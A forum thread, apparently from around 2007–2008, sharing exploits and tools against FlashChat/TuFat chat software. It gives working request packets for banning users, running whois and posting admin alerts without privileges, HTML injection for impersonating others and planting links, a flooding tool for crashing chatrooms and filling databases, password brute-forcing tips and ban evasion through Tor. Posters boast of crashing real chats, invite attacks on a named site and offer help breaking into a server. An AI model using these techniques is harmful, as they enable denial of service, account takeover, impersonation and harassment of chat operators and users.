Flashchat exploits, hacks, tools & more

Researching, Proof of Concepts, Hacking, Console Modding and Hacking and more. No game hacking / modding here.
Post Reply
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Flashchat exploits, hacks, tools & more

Post by Sethioz »

Knowledge Database article of Flashchat Exploits Is now available, everything from now on will go there, i will not update this post anymore

I will collect all the exploits and tools into this very post soon, so it is easy to find all the exploits and tools by only reading first post.
In this topic you will find: (only descriptions for now)

Gadgets:

flashchatz - cmd based program wrote by Luigi Auriemma, it is a fake user DOS attack and exploit tool for flashchat (attached to post, in downloads and on Luigi's site)

Extreme Flashchat-X - GUI based flashchat client with multiple exploits in it (see below). wrote by dark_lord_tnt (see in topic).

Exploits:

Following things can be done without knowing admin/mod password:
kickout another user (exept admin)
ban another user (exept admin)
check any user's IP with the "/whois" command
add room/s
ring bell
get any icon/emoticon in front of your name (including admin icon)
get any icon/emoticon into the message

maybe i missed something, but i will update first post time to time, any ill try to add all the exploits into this post.

//////////////////////////////////////////////////////////////////////////////////////////////////////////

Code: Select all

Bell
    sendAndLoad=%5Btype%20Function%5D&b=13355&c=ring&cid=1&id=

    add room
    sendAndLoad=%5Btype%20Function%5D&ps=&p=1&l=Cat&b=93647&c=adr&cid=1&id=

    admin icon:
    sendAndLoad=%5Btype%20Function%5D&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=

    mod icon:
    sendAndLoad=%5Btype%20Function%5D&a=%3Amod%3A&u=0&b=13862&c=ravt&cid=1&id=

    ip ban packet:
    sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
    5581 - id

    whois packet:    
    sendAndLoad=%5Btype%20Function%5D&s=7&t=%2Fwhois%20teele&r=2&u=0&b=20309&c=msg&cid=1&id=

    room alert:
    sendAndLoad=%5Btype%20Function%5D&s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=

    sendAndLoad=%5Btype%20Function%5D&s=7&t=chatalert&b=18370&c=calrt&cid=1&id=  
for paros proxy (or other intercepting proxys), replace this:

Code: Select all

5D&t=
with this:

Code: Select all

5D&s=7&t=
to get some of the admin rights. you will be able to use /kickout, /whois and such commands with this filter.



//////////////////////////////////////////////////////////////////////////////////////////////////////////

HTML/PHP code exploits:

*Invisible name:
enter this as name

Code: Select all

</b> 
*Impersonating others:
-login with invisible name
-now use this command to impersonate somebody

Code: Select all

/me <font color="#000000">[NAME] 0:00 xm: </font>
you can also get icon in front of name (including admin icon)

Code: Select all

/me <font color="#FFFFFF">:D  [NAME]: </font>
where ":D" is smile/icon. to get admin icon in front of name, put ":admin:". here's full example:

Code: Select all

/me <font color="#FF0000">:admin: [NAME]: </font>
-it may vary, depending on the chatroom. some does not use time, some use other font..etc. you must also find the color that this person uses (you can sniff it out from packets). so you just put his/her name into the brackets.

to get colored text too, do this:

Code: Select all

/me <font color="#FF0000">:D [NAME]: </font> <font color"=#8000BF">YOURMESSAGEHERE</font>
*Inject link into your name:
login with the following code/name

Code: Select all

<fontsize="13"></i><a href="http://link.here">Name</a></b> 
where "Name" is the name you want and "http://link.here" is obviously where you insert link.
Attachments
flashchatz.zip
(43.02 KiB) Downloaded 2639 times
Suicidal Looney
User
User
Posts: 57
Joined: Sun Jul 29, 2007 7:04 am

Re: Flashchatz - flashchat HACKS!!!

Post by Suicidal Looney »

hmm i see
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

oh yea and .. dont use this on our chatroom...it will fuck up db.
makes too much users....
User avatar
V
Important
Important
Posts: 159
Joined: Sat Jul 28, 2007 7:36 am

Re: Flashchatz - flashchat HACKS!!!

Post by V »

Damn loved the crash, bet those brats were squealing there like stuck pigs.
Last edited by V on Sun Jan 24, 2010 11:46 am, edited 1 time in total.
User avatar
Skizoteq
Forum user
Forum user
Posts: 108
Joined: Tue Jul 31, 2007 11:41 am

Re: Flashchatz - flashchat HACKS!!!

Post by Skizoteq »

Crashed xxx.xxx.xx many many times whit this puppy 8-) Thank you lord for creating this tool lol by lord i mean luigi :D

EDITED by Sethioz : removed the site name, because now this post is public !
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

yes indeed its a good one from him. I did got him some info he needed. I will start working to get it working with user : pass chatrooms. Luigi said that np there...he just needs me to get him some info. I need to setup a test chat for that.

oh and btw .. one of the whiners from that xxxxxx chat, he has site with chat too .. and you can crash it using proxy LOL. here it is killerbean.pri.ee .. theres chat too...crash it as much as you want :D
User avatar
Skizoteq
Forum user
Forum user
Posts: 108
Joined: Tue Jul 31, 2007 11:41 am

Re: Flashchatz - flashchat HACKS!!!

Post by Skizoteq »

killerbean :D Whats hes whining about lol User : pass chatrooms 8-) Oh man what would i ever do whitout luigi lol
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

I would have been written it myself probably...its not so hard. only need few commands and some data.
Btw guys .. i found MAJOR glitch/bug in the flashchat. It involves specially chats with user : pass.
For example if you mess up some chat so badly that admin decides to change it from ''free'' to ''user : pass'' .. then who ever registers first can choose option ''administrator'' ..actually he/she HAVE to choose that. So first registered user will be admin. If you are quicker than admin then you can simple get his place LOL.
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

FIX
If you dont want noobz crashing your chat, change the name of ''getxml.php'' file. ..and ofcourse you have to modify all the files that uses it (index.php, flashchat.php ..etc).

New crash method:
simply open .exe in HEX and modify the ''getxml.php'' to whtever you like.
-note that not all HEX editors work. (you will know if it works or not...if not then you get simple error - not win32 app)


New type of Flashchatz (ill add as attachment).
its still beta, so it doesnt work well. (user flooding works fine, but other options have problems)
-Features :
flood user : pass chatrooms, with all options.
added ''add room'' flooding (IF available for normal users)
added smile flooding ( :D ) ..it causes crash too.

ENJOY!!!

UPDATE
it seems that bell works in all chatrooms, but addroom doesnt seem to work in all chatrooms. I have disabled addroom in my chatroom, but i can still add rooms as normal user.
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

.
Attachments
flashchatz.zip
4.dets.07
(39.94 KiB) Downloaded 1994 times
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

This is hilarious guys :) I was testing with Luigi (he updated the flashchatz) ..he managed to make a ''player flood + bell'' ..so that gave me an idea.
If some fake user can ring bell . .then its possible to everybody. So i did some research .. and FINALLY. i found a way how to ring a bell as normal user (if bell is disabled for normal user).

Intrested ? ..course you are. Well what i use is ''Tamper data'' its an firefox add-on. It totally rocks. it allows you to edit EVERYTHING your browser sends. im also using ''live http header'' which Luigi suggested...its easier to capture data, but it wont work for bell. Thats y Luigi never got it working while in chat.
now .. you need the ''ring'' packet. it looks like this

Code: Select all

sendAndLoad=%5Btype%20Function%5D&b=13355&c=ring&cid=1&id=a6657021e8f389f3bc01dcdf0d9c7a54
you DO NOT need the id at end (after id=). im pretty sure you can use this packet.
So what you do is ... you will start tamper (click submit for everything else). you type something in the chat box (DO NOT send it).
for example if you type like ''BLAHTEST1'' ... then press ''send'' and look the tamper. once it gives you pop-up you will click on ''tamper'' this time not ''submit'' ..and look in the right side where the data is. Look closely .. if its the right packet: containing ''BLAHTEST1'' .. then copy the ''ring'' packet (WITHOUT ID !!!!) and replace the whole data there (NOT ID). and then send it ..if it asks something like ... change to ...then click ok.

Little bit messy ? I know ! I will make an video tutorial soon. once you see how tamper works you will understand it ...its easy.

UPDATE
I made video tutorial. hope my talking aint very fucked up (i was a tired)
Its in the Video Tutorials Section. ENJOY :D
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

MAYOR UPDATE:
special thanks to Luigi who wrote the tool.
now it is possible to load users from a file.
user pass
like this. still the old options

1 - user flooding
2 - message flooding
3 - room creation flooding
4 - smile flooding
5 - login/logout flooding
6 - user+bell flooding
+ now you are able to load users from a list.

if you run it, then it will ask you if you want to create users (only for the chatroom that requires registration) then you have 3 options:[
y - yes (start making users and flood with specified option)
N - no (do nothing, quit)
filename.txt (loads the specified file, it must be in the same dir with the flashchatz.exe)

YES you can use it to bruteforce user passwords..but simply adding ''victim'' username before each word in your wordlist.
to do this .. you can use cygnus hex editor (it seems that it works best)

it was made ? ..because it is possible to disable registration, so the flashchatz is useless during that. But now you can make users and write them down in file and use them later on. So target chatroom may have registration off, but you can still use existing users :twisted:

note: if you would like some changes ... like username complexity (only numbers, or only symbols instead of mix-alpha-num ones) etc, then let me know. I will make changes and recompile it and upload it.
Attachments
flashchatz.rar
new version of flashchatz (no source code)
(28.38 KiB) Downloaded 1859 times
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

just lil something i did myself...
this version only registers users on attack 1, but does not login. so if u wanna fuck up somebodys database...leave it on for 10 hours or so and it should fuck up database. (run 5-20 instances of it to get good results, even more with good connection, 100-200 should not be problem with 100kb upload, just test) I havent tested this on other attacks but 1, i just edited attack one so it registers only.
fff.exe ?? ..couldnt make up anything better..change it if u dont like it.
oh yes and it also have more complex names, it uses some symbols too in names and passes.

note: theres problem with attack 1 and 6 on original version. IT DOES NOT effect register only version (it doesnt have buffer)!!! it seems that luigi made a small mistake and it has infinite buffer size. in other words...leave it on for hour and bye bye pc (ur pc). Thats because theres no buffer limit, ill fix it someday...IF i need to ..but i doubt. no need for that. you will get banned anyways if you leave it on in some chatroom (crashing).
Attachments
fff.rar
(30.35 KiB) Downloaded 1657 times
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

Update:
Luigi fixed the memory problem and also fixed the problem with ''space'' in user and/or password.
Now you can use users/passes with spaces and it still loads the file as it should.

at this moment (19th april. 08) the latest version is 0.1.2c

I also added the version tht only registers users and don't login. Its remade and tested and works 100%.

I will also add on how to use this tool as password cracker. its very easy ! you only need commview and flashchatz, but i doubt tht any of u lazys need it :) ..so im not gonna post it after all. you can always reply here if u need to know how to crack passwords with it.
Attachments
flashchatz012c.rar
Flashchatz version 0.1.2c (fixed user/pass file reading and memory problem)
(27.73 KiB) Downloaded 1701 times
fregonly.rar
use attack 1 to register users. Its good to fuck up database.
(30.35 KiB) Downloaded 1674 times
david zaragoza
Newbie..
Newbie..
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am
Custom: i hate it when people disgrace me.....

FlashChat ( TuFat ) exploits

Post by david zaragoza »

i need help here to hack a TuFat flash chat

i gt the two programs usually used in this matter(WPE pro and tamper data addon for mozilla)

bt i dnt know how to use it.....

so anybody plz help me........


EDIT by Sethioz: topic name changed from "hack a TuFat flash chat"
If you want more detailed tutorial then check Flashchat exploits topic and reply there ! < theres exploits which allow you to ban and boot without admin/mod privileges and more !
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: hack a TuFat flash chat

Post by Sethioz »

ok do you mean "tufat flash chat" or just "flashchat" .. is tufat like name of the site/room or is it name of the actual chat system ?
have you looked this-Video- ?
tamper data and WPE are quite good in this matter. If it is some kind of chat system, then link would be good.
david zaragoza
Newbie..
Newbie..
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am
Custom: i hate it when people disgrace me.....

Re: hack a TuFat flash chat

Post by david zaragoza »

i meant tufat flashchat

its the name of the chat system

u can google it for more info

wat i want is an immortal mode where u can enter back just after been banned

do u know a way to do this ?
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: hack a TuFat flash chat

Post by Sethioz »

googling doesn't help me at all, i need example room where to test. reading about it won't give an idea how it works.
to me it seems that tufat flashchat is same as flashchat (one on my site).

as about banning, no there is no way to bypass IP or username ban. It is SQL based and you would need to hack into flashchat/site config files and SQL database to lift the ban. only way is to use other username and IP address.
you can also use proxy server. I have done research on it and the ip is only checked when connecting to flashchat. proxy server lags so it is not good to chat with proxy. what you can do is use proxy to login and then take it off.
You can use Vidalia+TOR and then firefox's addon called ProxySel
with that you will be able to enable/disable proxy with just one click, making it extremely easy to use proxy.

1. enable proxy
2. log into chatroom
3. disable proxy

that way also when admin/moderator checks your ip he/she will see the proxy ip you used to log into chatroom. FlashChat is weak and it does not check IP again. only checks it when you log into chat. I havent checked it, but maybe it is even possible to modify some packets so it wont send ip at all so flashchat thinks you are local client.

If you want more details and info .. give me URL to the chatroom you want to "hack". then i can take a look at it, if its same as mine or not.
david zaragoza
Newbie..
Newbie..
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am
Custom: i hate it when people disgrace me.....

Re: hack a TuFat flash chat

Post by david zaragoza »

the tufat flashchat is the same as in ur site....

im a rookie , so i dnt have any idea on how to hack into flashchat config files
abt proxy server, i tried it bt it seems to dnt work....
the firefox addon is nt compatible with my version of mozilla firefox 3.0...pity me

anyway i think its quite hard to hack just like tat....

bt i tried ur video tutorial on getting the admin or mod icon n it worked perfectly....

all the normal chatters thought im an admin....i even made fun with them by saying ur selected as a mod....lolz

had fun with tat....thank u very much sethioz....

bt i had to logout asap when the mod or admin enters.....to avoid being banned ....
then the chatroom mods can view my ip also .... i wanna be an invinsible rookie hacker....lolz




okie then ...how abt this .....changing the message name so it appears like somebody else said tat n make the somebody get banned instead of u....lolz


i read abt it in the topic "FLASHCHAT:ADMIN CONTROL PANEL"

ur msg in tat topic-

"as for more general. chatrooms are very vulnerable. i mean all kinds. for examples:
-in some chatrooms you can change message name, so it appears like somebody else said that (so you can get somebody else banned lol)....."


i actually watched this hack happened in a chatroom while i was chattin.....

the person wrote vulgar words n changed the message name to other person's name in the chatroom(the same chatroom url i sent to u by PM)....

n wow .........it gt the moderator to ban many innocent peoplez ..even me.....damm tat stupid mod......lolz....

so how abt it .....if u teach me how to do it ...it would be great deal of fun plus education...

futhermore knowledge is power ....:-)
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: hack a TuFat flash chat

Post by Sethioz »

yes it seems same, y u didnt want to post it out on public ? (url of chat i mean).
It also seem to be customized flash, it is not normal chatroom or at least it seems so. on some reason i didnt even got any data so icon or anything else didnt work on some reason. I just took a quick look in it. but the tool works perfectly :) (tool used to flood shit out of chatroom) it supports many different attack types: userflooding, message flooding, room creation ..etc. It does nothing to the chatroom itself, but it will crash browser's flash script...so everybody have to leave and relogin.
I've been in chatroom many times when it was used on chat .. and sometimes it even crashed my whole browser..doh.

as i said before, you can't bypass IP or username ban. only way is to change your IP or use proxy.
about firefox 3 .. it sucks big time. i even dunno why they made it. it looks childish and lags and doesn't support IMPORTANT addons..like proxysel, but you can always set proxy manually in settings. just put 127.0.0.1 9050 as proxy in firefox, but its annoying and u can't quickly enable/disable it. so i suggest you to get firefox 2 instead. its better in every way.

I will take another look in it anyways (chat).


Update:
i dunno what happend before, but now everything works :) It indeed is same flashchat, just didn't know its called tufat.
specific chatroom you talk about is not on the url you sent me. owner of site has moved the index.php of flashchat to another domain. ill give an example here:
flashchat.com/index.php - this is the chatroom where you sent me and this is where you login.
tufatchat.org/blahdoh/ - this is the path where all other chatroom files are located.

It doesn't really matter where the index is located, because it still sends info into right chatroom if you copy the index.php of the chat. I really have no clue how somebody was able to talk under other names in flashchat, because as far as i know it is ID based.
for example as shown in my tutorials, this is the admin icon:

Code: Select all

sendAndLoad=%5Btype%20Function%5D&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=
now look at the last bit of this data "id=" this is the id part. i left it empty, because you get id when you login or visit the getxml.php page. if you go directly to "getxml.php" (its the page that handles data sent by clients) you get this:

Code: Select all

−
	<response id="a71b57051abd921b01e995bbf31fca84">
<lout id="665982" t="6:22 pm">login</lout>
</response>
so it gives you id when you visit it too, but i dont think you can use this to talk under other name. you would need to know other person's ID and even then it somehow simply disconnects you.

You can try this ofcourse:
open private window with somebody (i suggest you use help of ur friend).
use commview or WPE pro or something like that to monitor your private messaging.
it should show you other person's ID, but im not sure.
then you can use tamper data and change your ID while sending message.
just like changing icons..etc. you monitor it with tamper data and click tamper, but change only ID not data.

ah yes. i got banned, so i had to use proxy myself. it works like a charm. i only loaded chatroom page with proxy. thats all you need to do. your IP is checked by chatroom only when you LOAD the page, not when you login. so enable proxy and LOAD the "index.php" and then you can disable proxy and login :) just to make it clear:

1. enable proxy
2. go to flashchat.com/index.php (where you see login screen)
3. disable proxy
4. enter name and login

almost forgot. a lil show-off at end :) check the pic and look closely for my message and name there ;)
Attachments
adminlol.JPG
(150.61 KiB) Downloaded 11338 times
david zaragoza
Newbie..
Newbie..
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am
Custom: i hate it when people disgrace me.....

Re: hack a TuFat flash chat

Post by david zaragoza »

sethioz .....u r the best .......

keep it up......thx for ur help....

i try out ur tutorial n give u the updates .....

n if u happen to get more flashchat hacks ....plz share wit me ....im always here to learn abt it...

thanx again...
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: hack a TuFat flash chat

Post by Sethioz »

:)
im sure there's more things that can be done, i just haven't exploited it more. Tried banning and booting only once and also same with talking under other names. boot worked, but im not sure what i did. think i used admin ID, but everyone can be admin if you use right password.
you can just mess around with tamper data and commview can be useful too.

oh yes. and you can create unbootable users lol, but you cant talk under them. you simply have to send the "join" packet again with different username (username has to be in same lenght or packet checksum is not same and it wont deliver) so the user you send with packets will appear, but is unbootable.
david zaragoza
Newbie..
Newbie..
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am
Custom: i hate it when people disgrace me.....

Re: hack a TuFat flash chat

Post by david zaragoza »

u said the tools ....wat do u mean by tat ....n how to use it

n also the attack types(userflooding,message flooding n etc)

n how to make all the chatters to leave and relogin ?...

and then the firefox 3 ...i uninstalled it ...now im using firefox 2.0 with the proxysel addon.....hoooooraay..

ur msg:
"tufatchat.org/blahdoh/ - this is the path where all other chatroom files are located"

this is wat u said earlier ..
so does it mean the mods password,admins password and banned ip's are kept there..

if it is ...then how to hack to the filez..n then also this part below i tried repetiting reading bt still cant get it....

ur msg:
"now look at the last bit of this data "id=" this is the id part. i left it empty, because you get id when you login or visit the getxml.php page. if you go directly to "getxml.php" (its the page that handles data sent by clients) you get this:

−
<response id="a71b57051abd921b01e995bbf31fca84">
<lout id="665982" t="6:22 pm">login</lout>
</response> "



anyway the proxysel addon ...i donno why it did nt work


i gt banned n then i closed the chat window n enabled the proxy b4 pressing the enter chat button...

after the login screen appears ...i turned off the proxy n input a different nick....n to my amazement it still displays 'YOU HAVE BEEN BANNED!'....mothaafuckaaz...

i tried alot of different proxy servers bt it still turned out to be same...

then the only way i can enter bck is by disconnecting n connecting again(i have a broadband connection wit dynamic IP)

n no clue why i cant use proxysel..

okay then ....


the last part here ...i dnt quite get u...can u plz explain more ..

"oh yes. and you can create unbootable users lol, but you cant talk under them. you simply have to send the "join" packet again with different username (username has to be in same lenght or packet checksum is not same and it wont deliver) so the user you send with packets will appear, but is unbootable"

wats unbootable users?

n also if there is a way to hack into the chatroom server ...it would be a big help ....
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: hack a TuFat flash chat

Post by Sethioz »

i attached the tool. Luigi wrote it, because im not that good with C.
unbootable - it means the user cannot be booted, kicked or banned.
i used Net Tools 5 to make those users. It really pisses admins and mods off lmao. when some user pops up with name like .. BOOT_ME! and there is nothing they can do LOL. or name like I_OWN_U. usually everybody will be in PANIC!, specially admins and mods. I also think that those fake unbootable users can be made using "tcpfp". it is one good tool written by Luigi.

You can't just enable proxysel, you have to set a proxy server first ! use this to check your IP:
-IP Check-
as i said, proxysel is just for enabling/disabling proxy, it is NOT a proxy server. you have to add a valid proxy server into list first.
I also told you to get Vidalia+TOR (proxy servers). install it and run it. default port where it runs is 9050. so it will be running on local ip:
127.0.0.1:9050
this is what you set in proxysel. you will make it use TOR. This is what i have in proxysel:
IP - 127.0.0.1
Port - 9050
Socks4

I also said that you have to LOAD the login page with proxy, not enter with it. So enable proxy and LOAD the chat index.php page, then take proxy off and enter.
Attachments
flashchatz.rar
flashchat fake player tool
(32.62 KiB) Downloaded 883 times
david zaragoza
Newbie..
Newbie..
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am
Custom: i hate it when people disgrace me.....

Re: hack a TuFat flash chat

Post by david zaragoza »

ok now i have vidalia,tor n also privoxy ......plus firefox addon proxysel..........

now how i can utilize it .....
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: hack a TuFat flash chat

Post by Sethioz »

eem .. you dunno how to run vidalia ?
as about privoxy. i've tried 2 times and didnt got it working. as i said about proxysel:
make a new proxy with the settings i gave.
then simply run vidalia (it will run TOR automatically) and enable proxysel (choose the proxy you made ofcourse).
Attachments
MSNscreen_293.png
MSNscreen_293.png (4.95 KiB) Viewed 63305 times
david zaragoza
Newbie..
Newbie..
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am
Custom: i hate it when people disgrace me.....

Re: hack a TuFat flash chat

Post by david zaragoza »

the Tor suckz ....

bt now im raged ....i wanna hack into the server ...do u know a way?
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: hack a TuFat flash chat

Post by Sethioz »

TOR is one of the best proxys there is.. its not one server, but many. why it sucks ? slow ? or you simply can't get it working ?
yes there's lots of ways to hack into a site, but it's not that simple. you need to run several scans and tests. ofcourse you can use flashchatz to bruteforce users too, but its long and dunno if i wanna put it out on public.
If you intrested in bruteforcing .. then in short. option 1 can take users from list, but it does not save the valid user:pass, so i used commview's filters and alarms to stop the flashchatz on right place and get the password. i also used HEX to make a wordlist with username in front of it (flashchatz format). you can add me into MSN or PM me if you wanna know details about it. it very likely that admin uses same password on site too.
david zaragoza
Newbie..
Newbie..
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am
Custom: i hate it when people disgrace me.....

Re: hack a TuFat flash chat

Post by david zaragoza »

yea ..okay bro ...thanx ...
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: hack a TuFat flash chat

Post by Sethioz »

LMAO, i just found something awsome, but i dont think i post it in public :D
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

PERMANENT admin rights in EVERY flashchat !!!
thats right, you read right.

its easy ! here's the packets:

Code: Select all

Bell
sendAndLoad=%5Btype%20Function%5D&b=13355&c=ring&cid=1&id=

add room
sendAndLoad=%5Btype%20Function%5D&ps=&p=1&l=Cat&b=93647&c=adr&cid=1&id=

admin icon:
sendAndLoad=%5Btype%20Function%5D&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=

mod icon:
sendAndLoad=%5Btype%20Function%5D&a=%3Amod%3A&u=0&b=13862&c=ravt&cid=1&id=

ip ban packet:

sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
5581 - id

whois packet:

sendAndLoad=%5Btype%20Function%5D&s=7&t=%2Fwhois%20NAME&r=2&u=0&b=20309&c=msg&cid=1&id=


room alert:
sendAndLoad=%5Btype%20Function%5D&s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=

sendAndLoad=%5Btype%20Function%5D&s=7&t=chatalert&b=18370&c=calrt&cid=1&id=
now the harder part. I am using paros proxy to do the filtering automatically so you will have admin rights :)
to get access to ban commands and whois..etc. you simply have to replace

Code: Select all

5D&t=
with

Code: Select all

5D&s=7&t=
and you can boot/ban ..etc ppl with a command.
now where you make it ?!
1. in paros proxy.
2. go to "tools" - "filter"
3. replace HTTP body rule
-this is where you do it. enable it and make your browser go thru the paros.

Lets take a look at one other packet.
Original Room Alert packet used by admins/mods:

Code: Select all

sendAndLoad=%5Btype%20Function%5D&s=0&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=
modified Room Alert packet, that can be used by non-admin/mod:

Code: Select all

sendAndLoad=%5Btype%20Function%5D&s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=
see difference ? s=0 is replaced with s=7. you cant make a filter here, because when you are normal user your packet will be totally different. you can use old good tamper data here, to use whole packet.
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: hack a TuFat flash chat

Post by Sethioz »

This new stuff i found really got me interested in it again. Basically you can do anything you want. Here's some values in packets, which i found out during my research. you can manipulate flashchat by changing those values in packets.

Code: Select all

t=
this is a text message sent into server. for example t=blah is like:
blah
this is how it looks in chat.

Code: Select all

u=
user. this is user id. it is used to PM or ban. Here's a PERFECT way to sniff out IDs. when you enter chatroom, then server sends you a response with all users and their IDs. it should be second response packet from server. For example when you send normal message, then the code part looks like this:

Code: Select all

t=blahblah&u=0
so 0 is public, but if you sniff out the user ID and use that instead. like so:

Code: Select all

t=blahblah&u=303
then you will send your text to user who's id is 303.

Code: Select all

c=
this is type of the message i guess. here's few variables:
ring - rings the bell
msg - message
banu - ban and ban ip

there's also r=, b=, s= ..etc, but im not sure what they do. "r" seems to be on 2 always (r=2).

i also found 2 tools that come in handy if you want to hack chatrooms:
WebScarab and Paros Proxy. both can intercept data. paros can make filters too, but it lags. webscarab can also intercept and edit responses.
david zaragoza2
Newbie..
Newbie..
Posts: 5
Joined: Thu Oct 30, 2008 2:16 pm

Re: hack a TuFat flash chat

Post by david zaragoza2 »

sorry sethioz ...i have been away ...

n by the way ...i cant log in wit my original user id( have no idea why is tat)...

so this is my new id

....the topic up there caught my eye ....

which program u used .....tamper data, wpe , or ....

pls tel me ....
User avatar
Sethioz
Admin
Admin
Posts: 4762
